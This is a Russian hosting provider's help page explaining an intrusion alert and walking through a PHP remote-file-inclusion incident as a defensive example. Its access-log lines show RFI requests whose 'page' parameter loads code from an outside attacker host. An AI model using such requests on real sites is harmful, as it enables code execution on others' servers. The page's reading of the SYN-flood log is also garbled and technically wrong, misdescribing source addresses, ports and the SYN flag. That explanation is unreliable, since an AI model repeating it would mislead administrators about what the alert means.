БитВеб
Вы получили оповещение от нашей системы предотвращения взлома:

Attack detail : 15Kpps/110Mbps
dateTime srcIp:srcPort dstIp:dstPort protocol flags bytes reason
2016.07.07 18:55:06 CEST 0.0.0.0:43086 1.1.1.1:80 TCP SYN 902 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:58118 11.1.1.1:80 TCP SYN 929 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:32830 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:50782 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:48237 1.1.1.1:80 TCP SYN 920 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 50.0.0.0:9736 1.1.1.1:80 TCP SYN 930 ATTACK:TCP_SYN
2016.07.07 18:55:06 CEST 0.0.0.0:26701 1.1.1.1:80 TCP SYN 936 ATTACK:TCP_SYN

Эти системные данные поступили к Вам как доказательство произведенного вторжения в компьютерную систему.

dateTime - центральноевропейское летнее время
srcIp:srcPort - локальный адрес "0.0.0.0:43086" означает, что взломщик открыл порты "43086, 58118 .... 26701" на Вашем сервере.
dstIp:dstPort - удаленный адрес "1.1.1.1:80" означает, что этот порт признает соединения всех устройств с любого порта.
protocol flags - означает, что протокол соединения "TCP SYN" в настоящий момент открыт и используется злоумышленниками.

Таким образом, мы можем выяснить, что программа была запущена с Вашей сервера. Наименование программы в этой связи скорее не так важно, так как взломщики часто используют выдуманные и неправильные названия программ, чтобы запутать администраторов.

Штрафные баллы

Все нарушение которые BITWEB отправляет своим клиентам отслеживаются и регистрируются в bitweb.center, при достижение определенного лимита по количеству отправленных уведомлений, о противоправных действиях в лице нарушителя или пострадавшего, услуги клиента навсегда блокируются.

Почему заблокировали сервер?

Вам следует знать, что закрытие Вашего сервера произошло не для того, чтобы Вас наказать, так как Вы сами являетесь жертвой, а скорее, чтобы защитить Вас. Можно предположить, что устранить проблему можно, просто завершив программу (kill). Однако опыт показывает, что если однажды на странице уже была найдена «дыра» в системе защиты, после этого ее взламывают все чаще и более агрессивно. Даже если наша система контроля регулярно проверяет состояние сервера, взломщику достаточно несколько секунд, чтобы причинить серьезный вред Вашей странице или серверам. Поэтому перед новым запуском сервера предпочтительно вначале определить «дыру» и закрыть ее. Наша система защищает все взломанные программы, и Ваш сервер будет закрыт, только если обнаружится, что взломщик все еще подключен к серверу или оставил после себя бэкдор, позволяющий ему легко получать повторный доступ к Вашему серверу. Таким образом, мы не даем взломщику проводить дальнейшие атаки.

Почему BITWEB не препятствует этим атакам на мой сервер?

При проведении атак такого вида у взломщика нет Вашего пароля, и он не имеет доступа к нашим серверам. Он просто использовал «дыру» в системе защиты Вашей страницы, чтобы через нее ввести код. Ни одна мера предосторожности на Вашей странице не сможет напрямую защитить от такого нападения. Мы могли бы ограничить правомочия скриптов на наших серверах, чтобы эти нападения больше не повторялись, но тогда возник бы неприятный побочный эффект, когда Вы не могли бы использовать многие новые возможности языков скриптов, таких как PHP Perl, Python…и это также в целом усложнило бы создание Ваших страниц. Поэтому мы решили предоставить Вам как можно больше свободы.

Как я могу найти и устранить «дыру» в системе защиты?

- Если Вы используете распространенную систему как, например, Wordpress, Joomla, phpBB, phpnuke...: для этих популярных систем разработчики регулярно предоставляют обновления, которые устраняют «дыры» в системе защиты, о которых сообщили пользователи. Обновите свою систему, и в дальнейшем получайте информацию о новых обновлениях, например, путем регистрации в списке сообщений официальной страницы программы. Если Вы уже используете последнюю версию программного обеспечения, то незамедлительно сообщите на официальном форуме программы о проблеме, так как в этом случае разработчики смогут быстро разработать и предоставить программу-корректор для «дыры» в системе защиты, которую Вы сможете потом установить.

- Если Вы используете найденные в сети или собственные скрипты: Самое простое решение: Вы можете воспользоваться нашей аутсорсинг-услугой, связавшись со службой поддержки BITWEB, которая составит для Вас предварительную смету расходов для поиска «дыры» в системе защиты. Во время атаки наши техники смогут: - обнаружить скрипт, содержащий ошибку - найти всевозможную информацию о происхождении атаки - найти «дыру» в системе защиты в скрипте с ошибкой - сделать заключение об использованном способе воздействия и методе, с помощью которого была найдена «дыра» в скрипте - предложить Вам некоторые меры по защите и коррекции для обеспечения лучшей защиты в будущем.

- Если Вы хотите осуществить поиск самостоятельно: разработать детальную процедуру, с помощью которой Вы с уверенностью сможете определить причину взлома, невозможно. Но, в целом, таким образом поступают, если взломщик использовал «дыру» в скрипте и применил запрос HTTP. Все запросы HTTP доступны в Ваших журналах регистрации.

1 Запомните дату и время получения оповещения

2 Просмотрите свои журналы регистрации, начиная с данного времени и постепенно расширьте время поиска в обратном направлении, пока не найдете неправильное (странное, отличное от других…) сообщение. Это может потребовать определенных навыков и опыта работы с форматами запросов.

3 Отметьте скрипт, упомянутый в запросе

4 Изучите скрипт, чтобы найти «дыру» в системе защиты.

5 Исправьте ошибку.

Пример

Мы покажем Вам процесс аутсорсинга защиты от атаки на одного из наших клиентов виртуального сервер. Таким образом, Вы сможете понять, что мы предпринимаем при нападении и какой способ действий Вам следует использовать, если Вы осуществляете поиск самостоятельно. Здесь речь идет о классической include-дыре, которую можно легко обнаружить.

1 Мы просматриваем журналы соединений. Если посмотреть в журналах регистрации по указанным датам, то можно найти в обоих случаях подозрительную запись:

65.39.172.139 www.*********.net - <23/Oct/2016:10:57:19 +0200> "GET /XII_IWB/index.php?page=http://65.39.172.139:113/2 HTTP/1.1" 200 1793 "-" "curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled)"
65.39.172.139 www.*********.net - <27/Oct/2016:20:52:33 +0200> "GET /XII_IWB/index.php?page=http://65.39.172.139:113/3 HTTP/1.1" 200 1793 "-" "curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled)

Эти записи подозрительные, так как замечено, что параметр page в URL – внешний адрес и использует нестандартный порт (стандартный порт для HTTP 80, а здесь происходит атака на порт 113):

index.php?page=https://65.39.172.139:113/4

2 Идем по следу взломщика; это может быть необходимо составления для жалобы или для того, чтобы связаться с хостером взломщика, чтобы он удалил его:

65.39.172.139 Вероятно, IP-адрес взломщика. К этому адресу не подключен обратный адрес (название устройства), но SOA показывает: 172.39.65.in-addr.arpa. 10800 IN SOA ns1.peer1.net

Administrative Contact:
Administrator, Domain [email protected]
1600-555 West Hastings Street
Vancouver, BC V6B 4N5
CA
(604) 683-7747

Целесообразно будет связаться с этой фирмой и проинформировать о происшествии, назвав время атаки и соответствующий IP-адрес.

3 Рассмотрим учетную запись и более подробно проблемный скрипт, чтобы найти «дыру» в системе защиты и, возможно, еще какие-то подозрительные факты: Сразу же можно заметить, что в корне папки XII_IWB находятся три «комических» папки:

drwxr-xr-x 13 ******** users 4096 jun 17 13:54
drwxr-xr-x 13 ******** users 4096 jun 17 13:54
drwxr-xr-x 13 ******** users 4096 jun 17 13:55

Эти три папки носят имена, которые состоят из знаков пробелов. Речь может идти о папках, которые оставил взломщик. Вы хотите их удалить?

После этого рассмотрим файл index.php:

На самом деле он содержит параметр $page, который вслед за этим вставляется в скрипт командой включения (). Контроль этого параметра очень недостаточен, так как он подхватывается командой включения и таким образом может исполнить вредоносный код.

4 Указания закрыть дыру и усилить меры безопасности: Самая первая мера может заключаться в блокировке IP-адреса взломщика, так как он всегда использует одинаковый адрес; но это не решает проблему в полной мере, так как другой взломщик (с другим IP-адресом) может использовать эту самую «дыру» с системе безопасности.

В дальнейшем необходимо закрыть «дыру» include. Для этого достаточно будет контролировать формат параметра page, введенного в URL. Если этот параметр имеет определенный формат (например, состоит только из букв), для проверки формата Вы можете использовать регулярное выражение.

Если используются различные форматы, то Вы можете, по крайней мере, запретить использование служебных знаков, например, / или строк, например, http://. Это очень сильно ограничивает возможности обхода. Незамедлительно перепроверьте таким же образом все свои скрипты на наличие «дыр» в системе безопасности и проведите общую проверку всех введенных пользователями или переданных по URL параметров.

© ООО «БИТВЕБ» 2013-2018